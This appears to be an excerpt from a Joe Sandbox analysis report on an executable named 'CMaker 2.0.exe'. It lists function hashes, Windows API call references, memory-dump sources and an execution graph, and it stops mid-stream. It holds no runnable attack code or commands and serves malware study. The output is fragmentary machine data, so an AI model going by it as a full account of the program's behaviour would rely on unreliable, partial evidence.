• API String ID: 2559590344-2084034818
• Opcode ID: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
• Instruction ID: 538b4d270b647e6ecd5f18ba376c5c2695be891ff24fab5e14c221a676154de0
• Opcode Fuzzy Hash: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
• Instruction Fuzzy Hash: 0431C361B0AA0285EF15DB42A8446756394BF0BBA4F9A45B5DD3EC73C1FF3CE9448341
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 9063112a897ac63af8ba62faf2419d83a9723f91e1d0204053fd492b5da33e5a
• Instruction ID: 901a0e3403c2e3a2ec85c7015842460940c5dfd772f390522d697e747fe581b6
• Opcode Fuzzy Hash: 9063112a897ac63af8ba62faf2419d83a9723f91e1d0204053fd492b5da33e5a
• Instruction Fuzzy Hash: 1121A12CB2E68241FB5CA7B1565113952524F967B0F9C47BCE93EC76D6FE2CB4108200
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
• Instruction ID: ac7526796cc28ec7220d2e8a25e4bca853cbd9ca9e020d392f39f8e1510f68a9
• Opcode Fuzzy Hash: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
• Instruction Fuzzy Hash: 52118B61B18A4586E7508B02E854339B2B0FB98BE4F008274EA7EC77E4EF7CD905C740
APIs
• GetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE57
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE8D
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEBA
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAECB
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEDC
• SetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEF7
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: ed24a123b6018f0c1ad5b4e4d40ee256577037ee5ecebad31f99fe0e5e584a4b
• Instruction ID: beb11b4b1b7a27f66c52ed043af6a477a8f72c20a326c3831d9f259a2054f206
• Opcode Fuzzy Hash: ed24a123b6018f0c1ad5b4e4d40ee256577037ee5ecebad31f99fe0e5e584a4b
• Instruction Fuzzy Hash: 3C117538B1C28245FB5897B1565103962515F9A7B0FAC47BCE93EC77DAFE2DB4418300
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
• Instruction ID: c3be862846ba974b8ca6b4ca6790a5b9614dc42c4bc37e6315a7f21a601d0e97
• Opcode Fuzzy Hash: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
• Instruction Fuzzy Hash: B7F062A9B09A0681EB148B64E8443795330BF497A5F949679DA7EC51E4FF2CD049C700
APIs
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF2F
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF4E
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF76
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF87
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF98
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
Strings
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Window$Process$ConsoleCurrentShowThread
• String ID:
• API String ID: 242035731-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Window$Process$ConsoleCurrentShowThread
• String ID:
• API String ID: 242035731-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF8C02
  • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
  • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FABEB005), ref: 00007FF6FABF8C20
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
• API String ID: 3580290477-2216745502
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                  • API String ID: 2020911589-4202072812
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
Memory Dump Source
• Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e976c7d52d63b22fb31b56c4490941d8cc1a2fff822a0a8f0b56688dff487660
                                                                                                                                                                                  • Instruction ID: 980de2122fad2ce61b5d2fd623980fe23cd54e90c36826b9455a6db1b309000c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e976c7d52d63b22fb31b56c4490941d8cc1a2fff822a0a8f0b56688dff487660
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA710861F58A490FE798EB6C48A93BAB7D2FF99250F49017AD04DC32D7DE6C6C818341
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1749691f7c22d01182ba3dbadb174c26e2a15cfc8dbed11777ddf6939aa11ec4
                                                                                                                                                                                  • Instruction ID: 04faf02927dee1cc490676bc6499171e82f2a5cf7bdd25e46704cef2c2b85943
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1749691f7c22d01182ba3dbadb174c26e2a15cfc8dbed11777ddf6939aa11ec4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B415921B19A880FD719EB3C986567A7BE1EF9B301B0941F6E18EC7267D92CDC428740
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: de195d68ccb489dfe31e6f00339a87b8d4f55420889985828831f62bfc827906
                                                                                                                                                                                  • Instruction ID: a91e643d85a3504db1666530c51b048150f2570d9422f02667d9f3a74bde3169
                                                                                                                                                                                  • Opcode Fuzzy Hash: de195d68ccb489dfe31e6f00339a87b8d4f55420889985828831f62bfc827906
                                                                                                                                                                                  • Instruction Fuzzy Hash: D331C871ACD2D11FD31653306C638E3BBA49F47325B1E02B7D449CB993C95E668383A2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0d65a0279c3d3ea30dda0c5234f3346f5067ff2772104341f88052511d2e07df
                                                                                                                                                                                  • Instruction ID: 98472af5227f6413b04a1349b395fc648d84b722caed82b8f44daea62b6100ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d65a0279c3d3ea30dda0c5234f3346f5067ff2772104341f88052511d2e07df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3701F902B4D9450FF754A67C1CF96F6A7C2DFAA311B0941B6D14CC3197DC4DAC825350
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 90b07c6e207da20d7b07a2537d0eadc698b6f100946f054e98050af6a016f546
                                                                                                                                                                                  • Instruction ID: f1d748c48359f3d08b317994e2529d0825bbfc1ec012cc7a44460363f5445558
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b07c6e207da20d7b07a2537d0eadc698b6f100946f054e98050af6a016f546
                                                                                                                                                                                  • Instruction Fuzzy Hash: B6F0C812B499090BF7A4A5BC1CF96FA97C2DBA9351F050179E50DC3287DC9DAC826340
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9adeea18e65b702053f7628ec35600161e45a229187874c6b30f22601e01a15b
                                                                                                                                                                                  • Instruction ID: a6302a88b28e77a8f75e8494e80dcb29d71ce5e0db5bf3bb2afa705d240925d1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9adeea18e65b702053f7628ec35600161e45a229187874c6b30f22601e01a15b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6301F120A0E2E20FE752637008B66F63F919F53320F0E81FAE55CCA0D3CE9E58829341
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d46b38ca7ee14a51384be16704feb26b9375cf5af097d38622dc87eac4bfbc43
                                                                                                                                                                                  • Instruction ID: c469906a94bbcf846aadb4c1cc8d242555ad869f760fc332aea614c900e5bad6
                                                                                                                                                                                  • Opcode Fuzzy Hash: d46b38ca7ee14a51384be16704feb26b9375cf5af097d38622dc87eac4bfbc43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F0A430B689194BE654A73898A56AAF2D2FFCD301F100539D50EC3385DE6CA8415785
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 191551a66b8ba475c8e0d97d5b23cc30314cc3f2427df5426cb743501d0e6926
                                                                                                                                                                                  • Instruction ID: 264b98bf15daf6bb026a1d91e13a159278e12bf542bc708253eee18814cbbc55
                                                                                                                                                                                  • Opcode Fuzzy Hash: 191551a66b8ba475c8e0d97d5b23cc30314cc3f2427df5426cb743501d0e6926
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF04611A0C6650FE344B66898B66BB7BD1EB96320B4908B9E808DA1A7EA1CD9814341

Execution Graph

Execution Coverage: 2.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.1%
Total number of Nodes: 749
Total number of Limit Nodes: 34
7ff6fabe7440 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80158->80388 80159 7ff6fabe299b 80164 7ff6fabe29a4 80159->80164 80165 7ff6fabe299f 80159->80165 80161 7ff6fabe26f8 80160->80161 80161->80149 80162 7ff6fabe2878 80168 7ff6fabe289f 80162->80168 80169 7ff6fabe287d 80162->80169 80353 7ff6fabe7040 80164->80353 80389 7ff6fabe75b0 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80165->80389 80171 7ff6fabe1bd0 49 API calls 80168->80171 80173 7ff6fabee444 74 API calls 80169->80173 80170 7ff6fabe2999 80170->80164 80174 7ff6fabe28be 80171->80174 80172 7ff6fabe29b0 __vcrt_freefls 80175 7ff6fabe2ab3 80172->80175 80176 7ff6fabe29f2 80172->80176 80173->80156 80180 7ff6fabe18d0 114 API calls 80174->80180 80393 7ff6fabe30c0 49 API calls 80175->80393 80179 7ff6fabe7040 14 API calls 80176->80179 80177->80158 80177->80159 80182 7ff6fabe29fe 80179->80182 80183 7ff6fabe28df 80180->80183 80181 7ff6fabe2ac1 80184 7ff6fabe2ad4 80181->80184 80185 7ff6fabe2ae0 80181->80185 80390 7ff6fabe71b0 40 API calls __vcrt_freefls 80182->80390 80183->80177 80187 7ff6fabe28ef 80183->80187 80394 7ff6fabe3210 80184->80394 80189 7ff6fabe1bd0 49 API calls 80185->80189 80191 7ff6fabe1df0 81 API calls 80187->80191 80192 7ff6fabe2a39 __vcrt_freefls 80189->80192 80190 7ff6fabe2a0d 80193 7ff6fabe2a84 80190->80193 80196 7ff6fabe2a17 80190->80196 80191->80161 80194 7ff6fabe7800 2 API calls 80192->80194 80200 7ff6fabe2a40 80192->80200 80391 7ff6fabe7490 87 API calls _log10_special 80193->80391 80198 7ff6fabe2b0d 80194->80198 80197 7ff6fabe1bd0 49 API calls 80196->80197 80197->80192 80198->80200 80201 7ff6fabe2b1e SetDllDirectoryW 80198->80201 80199 7ff6fabe2a89 80199->80200 80202 7ff6fabe2a9e 80199->80202 80207 7ff6fabe1df0 81 API calls 80200->80207 80203 7ff6fabe2b32 80201->80203 80392 7ff6fabe6e70 112 API calls 2 library calls 80202->80392 80205 7ff6fabe2c95 80203->80205 80397 7ff6fabe57b0 80 API calls 80203->80397 80211 7ff6fabe2ca0 80205->80211 80212 
7ff6fabe2ca7 80205->80212 80206 7ff6fabe2aa6 80206->80192 80209 7ff6fabe2aaa 80206->80209 80207->80161 80209->80200 80210 7ff6fabe2b44 80398 7ff6fabe5d20 113 API calls 2 library calls 80210->80398 80405 7ff6fabe7440 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80211->80405 80214 7ff6fabe2cb0 80212->80214 80215 7ff6fabe2cab 80212->80215 80366 7ff6fabe2240 80214->80366 80406 7ff6fabe75b0 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80215->80406 80217 7ff6fabe2ca5 80217->80214 80219 7ff6fabe2b59 80220 7ff6fabe2bb6 80219->80220 80222 7ff6fabe2b70 80219->80222 80399 7ff6fabe57f0 116 API calls _log10_special 80219->80399 80220->80205 80227 7ff6fabe2bcb 80220->80227 80234 7ff6fabe2b74 80222->80234 80400 7ff6fabe5b90 115 API calls 80222->80400 80403 7ff6fabe22a0 117 API calls 2 library calls 80227->80403 80228 7ff6fabe2b85 80228->80234 80401 7ff6fabe5ef0 82 API calls 80228->80401 80233 7ff6fabe2bd3 80233->80161 80237 7ff6fabe2bdb 80233->80237 80234->80220 80235 7ff6fabe1df0 81 API calls 80234->80235 80239 7ff6fabe2bae 80235->80239 80236 7ff6fabe2cd6 80404 7ff6fabe7420 LocalFree 80237->80404 80402 7ff6fabe59d0 FreeLibrary 80239->80402 80260->80116 80261->80124 80262->80126 80263->80112 80264->80115 80266 7ff6fac032ac 80265->80266 80267 7ff6fabeb2a2 80266->80267 80270 7ff6fabfc1a0 80266->80270 80267->80133 80269 7ff6fabebcb8 7 API calls 2 library calls 80267->80269 80269->80133 80281 7ff6fac001d8 EnterCriticalSection 80270->80281 80272 7ff6fabfc1b0 80273 7ff6fabf7f1c 43 API calls 80272->80273 80274 7ff6fabfc1b9 80273->80274 80275 7ff6fabfc1c7 80274->80275 80276 7ff6fabfbf9c 45 API calls 80274->80276 80277 7ff6fac00238 _isindst LeaveCriticalSection 80275->80277 80279 7ff6fabfc1c2 80276->80279 80278 7ff6fabfc1d3 80277->80278 80278->80266 80280 7ff6fabfc08c GetStdHandle GetFileType 80279->80280 80280->80275 80282->80139 80283->80138 80287 7ff6fabff380 80284->80287 80285 7ff6fabff3d3 80408 7ff6fabfa3d8 37 API calls 2 
library calls 80285->80408 80287->80285 80289 7ff6fabff426 80287->80289 80288 7ff6fabff3fc 80288->80144 80409 7ff6fabff258 71 API calls _fread_nolock 80289->80409 80410 7ff6fabeacb0 80291->80410 80294 7ff6fabe25db 80417 7ff6fabe1ed0 80 API calls 80294->80417 80295 7ff6fabe25f8 80412 7ff6fabe76f0 FindFirstFileExW 80295->80412 80299 7ff6fabe2665 80420 7ff6fabe78b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 80299->80420 80300 7ff6fabe260b 80418 7ff6fabe7770 CreateFileW GetFinalPathNameByHandleW CloseHandle 80300->80418 80302 7ff6fabea9b0 _log10_special 8 API calls 80305 7ff6fabe269d 80302->80305 80304 7ff6fabe2673 80312 7ff6fabe25ee 80304->80312 80421 7ff6fabe1e50 78 API calls 80304->80421 80305->80161 80313 7ff6fabe18d0 80305->80313 80306 7ff6fabe2618 80307 7ff6fabe2634 __vcrt_InitializeCriticalSectionEx 80306->80307 80308 7ff6fabe261c 80306->80308 80307->80299 80419 7ff6fabe1e50 78 API calls 80308->80419 80311 7ff6fabe262d 80311->80312 80312->80302 80314 7ff6fabe31a0 108 API calls 80313->80314 80315 7ff6fabe1905 80314->80315 80316 7ff6fabe1b96 80315->80316 80318 7ff6fabe6870 83 API calls 80315->80318 80317 7ff6fabea9b0 _log10_special 8 API calls 80316->80317 80320 7ff6fabe1bb1 80317->80320 80319 7ff6fabe194b 80318->80319 80321 7ff6fabeeacc 73 API calls 80319->80321 80352 7ff6fabe197c 80319->80352 80320->80150 80320->80151 80323 7ff6fabe1965 80321->80323 80322 7ff6fabee444 74 API calls 80322->80316 80324 7ff6fabe1981 80323->80324 80325 7ff6fabe1969 80323->80325 80327 7ff6fabee794 _fread_nolock 53 API calls 80324->80327 80422 7ff6fabe1db0 80 API calls 80325->80422 80328 7ff6fabe1999 80327->80328 80329 7ff6fabe199f 80328->80329 80330 7ff6fabe19b7 80328->80330 80423 7ff6fabe1db0 80 API calls 80329->80423 80332 7ff6fabe19ce 80330->80332 80333 7ff6fabe19e6 80330->80333 80424 7ff6fabe1db0 80 API calls 80332->80424 80335 7ff6fabe1bd0 49 API calls 80333->80335 80336 